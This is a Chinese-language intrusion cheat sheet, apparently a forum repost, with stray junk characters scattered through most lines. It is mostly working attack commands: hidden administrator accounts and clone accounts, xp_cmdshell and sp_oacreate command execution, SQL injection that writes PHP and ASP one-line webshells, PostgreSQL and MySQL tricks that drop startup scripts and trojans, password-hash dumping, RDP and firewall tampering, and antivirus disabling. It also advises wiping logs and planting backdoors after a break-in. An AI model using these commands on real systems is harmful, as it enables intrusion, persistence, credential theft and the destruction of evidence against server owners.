渗透技术大全

admin

9 F1 E2 U8 Q+ S7 l2 x- P1.net user administrator /passwordreq:no
2 q- B# u3 w7 i& k* Z这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
) ?2 z. g) M' {2.比较巧妙的建克隆号的步骤
  o2 z! a' R- @( [5 Q8 g先建一个user的用户
然后导出注册表。然后在计算机管理里删掉
! Q8 \$ F* ~, c, \在导入，在添加为管理员组
3.查radmin密码
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
6 k0 s% U* S+ y0 f8 D建立一个"services.exe"的项
6 m# M% J; V. I再在其下面建立(字符串值)
; g! b3 k0 I3 s5 C键值为mu ma的全路径
- {1 ]8 A9 c6 _/ v" V5.runas /user:guest cmd
' K1 p* d' l' P测试用户权限！
5 s% H2 y7 M, D- d! z3 \& y6.、 tlntadmn config sec = -ntlm    exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'--   其实是利用了tlntadmn这个命令。想要详细了解，输入/?看看吧。（这个是需要管理员权限的哦）建立相同用户通过ntml验证就不必我说了吧？
7.入侵后漏洞修补、痕迹清理，后门置放：
) d9 N  i' k, Z! j基础漏洞必须修补，如SU提权，SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录；你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好，使用查询分析器会留下记录，位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之；IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录，如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个，标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴，如果这个机器只是台普通的肉鸡，放个TXT到管理员桌面吧~提醒他你入侵了，放置了某个后门，添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门
7 T8 W7 A' ^# D9 I8 o, q( d' r- s8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c

for example

5 y  x6 {8 R) r! Odeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'

" H6 H5 Y$ R' |2 ^+ @( B  ]declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'
' s6 C& y, T0 T) C
9:MSSQL SERVER 2005默认把xpcmdshell 给ON了
# D+ P) f: t+ r9 C/ w如果要启用的话就必须把他加到高级用户模式
可以直接在注入点那里直接注入
6 n3 z/ ^: |5 Z% y' {id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
" c" s9 Y0 U1 F& c3 G然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
( a2 x- I4 L8 c3 V, j+ x或者
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
来恢复cmdshell。

8 o$ }  k* v3 q. \6 K& P分析器
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
$ A8 A9 W; p0 Y  U# j' g然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
% Y7 o9 G3 N9 r6 \1 \3 t& B( s: J10.xp_cmdshell新的恢复办法
1 {  j. c; m6 j: b& S; V/ l, ]xp_cmdshell新的恢复办法
# x. j4 W2 y$ I! m+ m* j$ m扩展储存过程被删除以后可以有很简单的办法恢复：
删除
drop procedure sp_addextendedproc
drop procedure sp_oacreate
: T7 ~# d# l9 R2 O+ m; ]exec sp_dropextendedproc 'xp_cmdshell'

  Y' y( W7 r& V! P恢复
3 {& j" ?* z. j/ w/ p3 gdbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
2 P/ l8 Y8 p: }$ O) F! e2 m
' \' K" b2 l2 [% a& t这样可以直接恢复，不用去管sp_addextendedproc是不是存在
, i2 _) [1 l( o4 v
+ K: A% Z- n0 M. b" s! x+ j-----------------------------

6 B, L, M0 t/ @  S- {删除扩展存储过过程xp_cmdshell的语句:
exec sp_dropextendedproc 'xp_cmdshell'

恢复cmdshell的sql语句
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

* g2 |) R6 @! G  O1 N
开启cmdshell的sql语句
, R8 T* Z8 _% K( k3 ~" K" J6 ?+ ?
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

判断存储扩展是否存在
6 ~+ [! x$ X4 [: P) Pselect count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
返回结果为1就ok

恢复xp_cmdshell
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
返回结果为1就ok

否则上传xplog7.0.dll
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'

堵上cmdshell的sql语句
* N: Y+ W* j1 O0 j  V/ ?0 Nsp_dropextendedproc "xp_cmdshel
-------------------------
! N) p9 h0 c; k/ q4 R1 X( `清除3389的登录记录用一条系统自带的命令：
: E# h6 l. W+ x' vreg delete "hkcu\Software\Microsoft\Terminal Server Client"  /f

然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件
9 S8 m' r& G. h在 mysql里查看当前用户的权限
2 a: C! V/ d( V) Wshow grants for  
9 v6 l* x3 a# D3 ~! A( m
* ^$ k# ^' a& Q: M7 P0 n以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql，只可以本地连，对外拒绝连接。以下方法可以帮助你解决这个问题了，下面的语句功能是，建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
& ?+ P& ?$ {. y8 {4 `' M: Z) Q

5 c6 w$ F* L/ D+ L" |Create USER 'itpro'@'%' IDENTIFIED BY '123';

" q' j6 ~* Z$ MGRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
. B3 J' n, C; C% F2 z8 p. q
/ H4 j( `, M0 N( `; K' G7 g+ QMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0

. y( A9 \% S; D/ w, NMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
2 X5 Z' I( y) C" Z' n% }6 q
搞完事记得删除脚印哟。

% Z0 h( z8 ~2 P/ eDrop USER 'itpro'@'%';
& o7 z' B0 V: `. n. @% P% P" k
Drop DATABASE IF EXISTS `itpro` ;
* L. U2 `2 |6 S$ }4 v& F! y
当前用户获取system权限
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact
# C. X7 f- W9 z: o( Ssc start SuperCMD
程序代码
<SCRIPT LANGUAGE="VBScript">
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","nosec")
od.SetPassword "123456abc!@#"
od.SetInfo
3 c$ o7 j1 g# s+ v; z: @* n& ISet of=GetObject(os&"/nosec",user)
3 s5 Y8 g5 K+ _: t% K8 y" Ooe.add os&"/nosec"
</Script>
' j" G3 @  B: t0 j<script language=javascript>window.close();</script>

2 |- d( N3 L8 q6 q) e5 i

2 R$ y* F2 _3 G- p2 l- w! [
突破验证码限制入后台拿shell
( ^$ B! Q1 B! c4 }+ G程序代码
3 |" D* Z2 C- aREGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
"BlockXBM"=dword:00000000

保存为code.reg，导入注册表，重器IE
就可以了
9 O% x$ x7 C- |# E- ~union写马
) S6 D0 t* k$ e程序代码
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*

应用在dedecms注射漏洞上,无后台写马
dedecms后台，无文件管理器，没有outfile权限的时候
, g! o" Z8 d: R7 h3 w4 B在插件管理-病毒扫描里
( P" h, p' f4 W写一句话进include/config_hand.php里
9 o+ ]6 L  h0 k" d* |; E3 B程序代码
+ O1 v( }2 m% M>';?><?php @eval($_POST[cmd]);?>


; v* R- l+ \$ x# e  ^如上格式

4 `' U" M7 d+ y9 W( x! s" ioracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
程序代码
select username,password from dba_users;
' @& V: O2 y6 d. E  E2 `
$ k* A) J7 t4 r! V
mysql远程连接用户
程序代码

9 D8 _1 {; F7 C& p& W; K$ S/ MCreate USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
7 N8 ]. K& ~4 k6 d6 o# R: QMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;



) Q# c/ R% d( i, L- Z
' d5 Q' W9 I' u8 f" ]  x- Q2 S' R( Vecho y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
( A! j/ H) B  {1 s' T+ t* D
1.查询终端端口

xp&2003：REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber

& {  N9 y& v8 v- S( x通用：regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
type tsp.reg
8 C4 S  X! n# B  p( g; P3 g) |
2.开启XP&2003终端服务
* T5 F- E$ T+ k0 w
0 S/ v% K2 q3 ~/ ^0 ^; ~3 x" O$ q
& l. F2 b3 V9 z  IREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
+ M( t; L7 k1 F9 O% h. J

$ t- f& B' @  }( n4 o6 _9 N/ DREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

3.更改终端端口为20008(0x4E28)
* ^5 e2 u# _- E0 M$ ]
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
: _, B  H) M  U
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
5 W) ?5 L9 I; ^2 e* x0 d3 B
3 T0 ]* B  s; i! L9 n* e4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
6 e% ?" D! |/ z' U& i5 l, u0 m" Y
. O  E* H  b/ I0 [6 r0 kREG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f

( @3 G# Z2 c: k+ y% l5 t- J
. V' t1 T  c; |5.开启Win2000的终端，端口为3389(需重启)

/ O/ ^  E: c0 U& L5 R) Z4 mecho Windows Registry Editor Version 5.00 >2000.reg
echo. >>2000.reg
# H3 j$ n. X2 R3 I0 Mecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
echo "Enabled"="0" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
echo "ShutdownWithoutLogon"="0" >>2000.reg
+ o7 g9 B  {: m7 e, P# @9 \  }8 wecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
! @6 E* h( t# d7 B# q% M: secho "EnableAdminTSRemote"=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
% ~9 |  o: ], u" A3 becho "TSEnabled"=dword:00000001 >>2000.reg
% K% f" G7 y/ Z7 n' Eecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
echo "Start"=dword:00000002 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
echo "Start"=dword:00000002 >>2000.reg
3 p' d, N+ ]3 I9 \+ secho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
echo "Hotkey"="1" >>2000.reg
6 T; w0 h) ^$ i& ?$ Recho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
& L! ~6 r$ f4 @2 }$ h' [) N$ kecho "ortNumber"=dword:00000D3D >>2000.reg
9 v* X# g+ ~7 @7 Qecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
echo "ortNumber"=dword:00000D3D >>2000.reg
% q: G0 R+ D* Y" a2 B8 Q. |
  _& M. j. E( c" \! o6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
. t9 _7 Q- W7 H5 z8 _
8 q, f! ^9 {, |; o1 n5 c& w@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
(set inf=InstallHinfSection DefaultInstall)
: {" ]8 g" C# ~: }) o' B+ X* F( pecho signature=$chicago$ >> restart.inf
echo [defaultinstall] >> restart.inf
rundll32 setupapi,%inf% 1 %temp%\restart.inf


% _$ j4 A5 ]. k& @8 e7.禁用TCP/IP端口筛选 (需重启)

REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f

3 _( f1 p! Y! x* Y8.终端超出最大连接数时可用下面的命令来连接

/ k! r( u; I3 @2 H+ Y  Q( gmstsc /v:ip:3389 /console
$ u' b; ]* J7 a
9.调整NTFS分区权限
! [5 y0 P6 S6 h9 k" {- [
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
$ S1 ?$ i4 Z2 Z
cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)

' @6 k9 V  a# d6 h6 v+ ^6 \, h------------------------------------------------------
3389.vbs
  q/ m/ @6 G6 u! n/ ]0 fOn Error Resume Next
const HKEY_LOCAL_MACHINE = &H80000002
9 D; I) k: M% Q! ?+ l' TstrComputer = "."
, K6 Q1 a& @- nSet StdOut = WScript.StdOut
; x6 q* Q7 N$ v! \' OSet oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
3 G5 \9 w& c4 F  {, t! \- n4 |strComputer & "\root\default:StdRegProv")
7 L. K7 v! U. Q3 `strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
, n$ \) z! \2 V& v2 Soreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
( Y- Z, Q: J" u# F$ RstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
6 b1 j( l. A& k$ E) W! _# xstrValueName = "fDenyTSConnections"
8 `( }! e; S8 Q' O6 u, LdwValue = 0
* V( \: _" B7 w* a( xoreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
; f; O* M+ b9 B% W" _strValueName = "ortNumber"
! [  j+ }! J& F& LdwValue = 3389
3 U4 |# y! _: s1 Z& ^oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
9 l% ^8 Q9 N% W, `7 PstrValueName = "ortNumber"
dwValue = 3389
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
9 N/ W& `9 s% g7 b; aSet R = CreateObject("WScript.Shell")
R.run("Shutdown.exe -f -r -t 0")

6 Q5 y$ y4 |6 [0 @% w( B" p删除awgina.dll的注册表键值
2 _1 T; H& z7 q4 `! e, X1 {程序代码

reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f

6 u+ m. g$ s" D' q6 B1 T+ q  _6 Z

; w% `5 W1 M/ F3 x; j( J
程序代码
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
# a& `; b9 E6 L( H6 `1 Y
  R6 O& c* q- e. _9 z. m设置为1，关闭LM Hash

数据库安全:入侵Oracle数据库常用操作命令
% _: H& U( G" W) L0 S8 G最近遇到一个使用了Oracle数据库的服务器，在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦，为了兄弟们以后少走些弯路，我把入侵当中必需的命令整理出来。
1、su – oracle 不是必需，适合于没有DBA密码时使用，可以不用密码来进入sqlplus界面。
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
, `$ h7 t5 b' j/ V( N9 Z- \' j3、SQL>connect / as sysdba ;（as sysoper）或
connect internal/oracle AS SYSDBA ;(scott/tiger)
conn sys/change_on_install as sysdba;
+ F- j  |9 L/ w1 Y4、SQL>startup; 启动数据库实例
5、查看当前的所有数据库: select * from v$database;
3 ?# B1 r- u( w$ z5 Jselect name from v$database;
" j  e8 H! ~: S5 B  e+ r6、desc v$databases; 查看数据库结构字段
# Y8 v0 N5 O  F& ^; ?7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
/ B: N, g% v3 y6 P1 DSQL>select * from V_$PWFILE_USERS;
Show user;查看当前数据库连接用户
( Z4 ]- a) _4 O4 T+ M0 a$ @; m+ R8、进入test数据库：database test;
4 C- ]! X# o8 k& p8 E9 ]" a9、查看所有的数据库实例：select * from v$instance；
1 X# g- A1 f2 l; d; B如：ora9i
10、查看当前库的所有数据表：
SQL> select TABLE_NAME from all_tables;
select * from all_tables;
SQL> select table_name from all_tables where table_name like '%u%';
  A# ?; k- z! v& m* [TABLE_NAME
5 Y( O6 O4 }, G2 r  j5 n% K# ]------------------------------
# J* v" r0 J. W) b/ h& S" o_default_auditing_options_
6 t8 Y# S8 Z1 S) P' a5 }1 a* A11、查看表结构：desc all_tables;
2 O# W+ M8 k8 K' |: [; k9 A$ w5 F12、显示CQI.T_BBS_XUSER的所有字段结构：
desc CQI.T_BBS_XUSER;
13、获得CQI.T_BBS_XUSER表中的记录：
& l6 e4 p. g& z) }select * from CQI.T_BBS_XUSER;
- Z! `2 `; Z) \0 x# b14、增加数据库用户：(test11/test)
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
# U2 i8 B7 i& A- l15、用户授权:
grant connect,resource,dba to test11;
grant sysdba to test11;
commit;
16、更改数据库用户的密码：(将sys与system的密码改为test.)
# w. g; o, v) r4 c- W) ialter user sys indentified by test;
  w8 Y/ N4 L2 ^7 q2 _- @+ u4 Salter user system indentified by test;
5 e. N9 n( |- s9 \1 I
applicationContext-util.xml
applicationContext.xml
struts-config.xml
web.xml
server.xml
( j/ k  `0 g# g' K. B' F( @0 \+ B% rtomcat-users.xml
hibernate.cfg.xml
database_pool_config.xml
3 |; e& q: S- v" S
: E4 t: a: H' \' m8 t. o* u; x7 i% y
\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置
\WEB-INF\server.xml         类似http.conf+mysql.ini+php.ini
\WEB-INF\struts-config.xml  文件目录结构

spring.properties 里边包含hibernate.cfg.xml的名称


/ p" B$ A4 |6 V; m! I, G% k4 [) wC:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
% z. X4 t+ Z+ W- J
如果都找不到  那就看看class文件吧。。
' ^; q/ L9 D  d# S  z
  i( I; }+ l( P5 q测试1：
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1

测试2：
5 _# [8 Z' x" i! |; X( j+ L, N
5 H9 m, Q# e& r2 {8 f  G- Vcreate table dirs(paths varchar(100),paths1 varchar(100), id int)
2 t* y' |  i8 @) v+ Z
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
, o% a$ z9 v0 l
. H/ y( Y( ~) I  b1 b& YSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1

查看虚拟机中的共享文件：
7 [3 \  o& a$ c+ W; @# w. ^在虚拟机中的cmd中执行
: Q8 \  R5 d1 j9 c$ K& ]\\.host\Shared Folders
+ j' H: V  O# _8 m: p% B
' V/ E6 k; H; }cmdshell下找终端的技巧
3 e" U; r$ b' M, B0 y找终端：
) H' C+ V1 r' k第一步: Tasklist/SVC 列出所有进程，系统服务及其对应的PID值!
　　 而终端所对应的服务名为：TermService
第二步：用netstat -ano命令，列出所有端口对应的PID值!
　　 找到PID值所对应的端口
' {- L8 A/ V8 W+ p+ a/ R# H
% R+ N% o  r# D2 k) |查询sql server 2005中的密码hash
SELECT password_hash FROM sys.sql_logins where name='sa'
  @5 w8 z1 D- z1 R. K' kSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
access中导出shell

" Z; ?0 Q: i! t中文版本操作系统中针对mysql添加用户完整代码：

use test;
create table a (cmd text);
; c9 r/ C! a/ @insert into a values ("set wshshell=createobject (""wscript.shell"") " );
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
5 E( S# _2 l2 d9 ?0 d( Ninsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
, }8 N0 s* `& x! f/ S  @select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
1 k3 R2 u3 u8 T! Gdrop table a;

英文版本：
$ r. v1 b4 j, ~! X3 F5 q( v
use test;
create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
( g* C( _: D' s# G# l- h( ^4 e: Rinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
1 n- j. `) A! x% M: C0 ~. a8 X0 Odrop table a;

create table a (cmd BLOB);
insert into a values （CONVERT(木马的16进制代码,CHAR));
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'
/ f4 w6 X2 ~7 @: t9 rdrop table a;

记录一下怎么处理变态诺顿
, S/ G1 X. G  C# }# z# k查看诺顿服务的路径
  M3 X3 w2 P$ rsc qc ccSetMgr
8 j  S" G7 F, ?; @% h: o然后设置权限拒绝访问。做绝一点。。
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
+ d; b' L6 U5 Q7 [0 K$ w8 Icacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
- G& y, J' L0 o% v$ ucacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone

然后再重启服务器
0 l% ^9 R  }; K3 f! R1 l8 aiisreset /reboot
这样就搞定了。。不过完事后。记得恢复权限。。。。
7 x0 j+ \# ^' s- e2 O- {cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
7 M7 B0 @! G3 _. ccacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
9 A- a" ?: [1 j) N3 r# Xcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
" w6 K9 u+ [! B% M# f8 GSELECT '<%eval(request(chr(35)))%>' into [fuck]  in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
# }6 F* o& N7 @, s8 u2 H8 s
4 {+ \4 y) b, F$ i9 H7 x4 fEXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')

postgresql注射的一些东西
8 S) Z" M/ e& I1 `  ]) M如何获得webshell
5 g6 @* H& v' B8 Y! chttp://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
$ A+ J7 Q' `( W' }0 ehttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
如何读文件
+ O4 m/ @/ Y/ ]2 vhttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
! }3 t( p. x' j/ @, @http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
" @9 X& a! C$ ]+ d$ G* ?5 `4 zhttp://127.0.0.1/postgresql.php?id=1;select * from myfile;

/ S+ h. c  `* ]- D7 w0 Q. @: ~z执行命令有两种方式，一种是需要自定义的lic函数支持，一种是用pl/python支持的。
5 e) ]& s0 g( b% }8 D, T: N当然，这些的postgresql的数据库版本必须大于8.X
3 Q9 ]8 }5 E" }$ e, `/ f5 O创建一个system的函数：
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
( A6 \; B& }+ d% g( b0 L7 h
4 ~4 X7 O5 U! h创建一个输出表：
CREATE TABLE stdout(id serial, system_out text)

' |9 M0 I9 m, x% _5 l执行shell，输出到输出表内：
SELECT system('uname -a > /tmp/test')

copy 输出的内容到表里面；
COPY stdout(system_out) FROM '/tmp/test'

, f8 l+ V5 `# T' ~从输出表内读取执行后的回显，判断是否执行成功
; K, p7 C2 Y6 Y1 a2 \7 Q
SELECT system_out FROM stdout
( C4 ]5 I  D/ ~% s* C8 N& f下面是测试例子

, G) T2 e; A- h5 }) P7 H( q/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --

: U- ~+ G- n6 t) L$ z  j& I/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
' Y4 e/ E/ V$ P$ fSTRICT --

5 J  t* A& k" O" K! l/store.php?id=1; SELECT system('uname -a > /tmp/test') --
) ?/ ^, J  T6 r3 ?: L# ]5 D
- {: L; I. k; S. }, O* J9 C2 W; Z/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
3 z) N( c; j5 p
( O, N, u& j! @/ P/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
( l9 ^! Q$ f. C: v" S- Anet stop sharedaccess    stop the default firewall
netsh firewall show      show/config default firewall
netsh firewall set notifications disable   disable the notify when the program is disabled by the default firewall
: V2 ^6 f9 m# A  O( x3 Lnetsh firewall add allowedprogram c:\1.exe Svchost     add the program which is allowed by default firewall
& }7 w5 g% X7 c修改3389端口方法（修改后不易被扫出）
修改服务器端的端口设置,注册表有2个地方需要修改
8 n* P4 X; @1 V' i1 z
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
PortNumber值，默认是3389，修改成所希望的端口，比如6000

第二个地方：
  w) ?; X: `" y+ ~[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]　
+ N* g% o- G. o( y2 R: nPortNumber值，默认是3389，修改成所希望的端口，比如6000
. [' i- j9 C. h% Q! Q
: f: P" q8 \- U. t, j现在这样就可以了。重启系统就可以了

查看3389远程登录的脚本
9 N  u- L2 H! J) o, L7 t保存为一个bat文件
! r5 S( w, C! B3 U# n4 ]date /t >>D:\sec\TSlog\ts.log
time /t >>D:\sec\TSlog\ts.log
$ x9 M$ o7 v; p4 ^/ s. D1 Xnetstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
start Explorer
5 Z, M2 Q4 o$ F. k- m
- G) t9 m  p4 {: \4 Omstsc的参数：

远程桌面连接

MSTSC      [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
; p6 X  e- w" K  [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?

& |8 O- g# N8 f7 H5 \6 B# g, t<Connection File> -- 指定连接的 .rdp 文件的名称。
6 d: W5 o" K1 I+ y( r
/v:<server[:port]> -- 指定要连接到的终端服务器。
: C% P. A. J7 A' C5 a3 l6 Z- J* b! G
, }  E5 t% s6 p9 u( {( ]/console -- 连接到服务器的控制台会话。

/f -- 以全屏模式启动客户端。

) w- F# `4 |1 i- g/ N' e/w:<width> --  指定远程桌面屏幕的宽度。
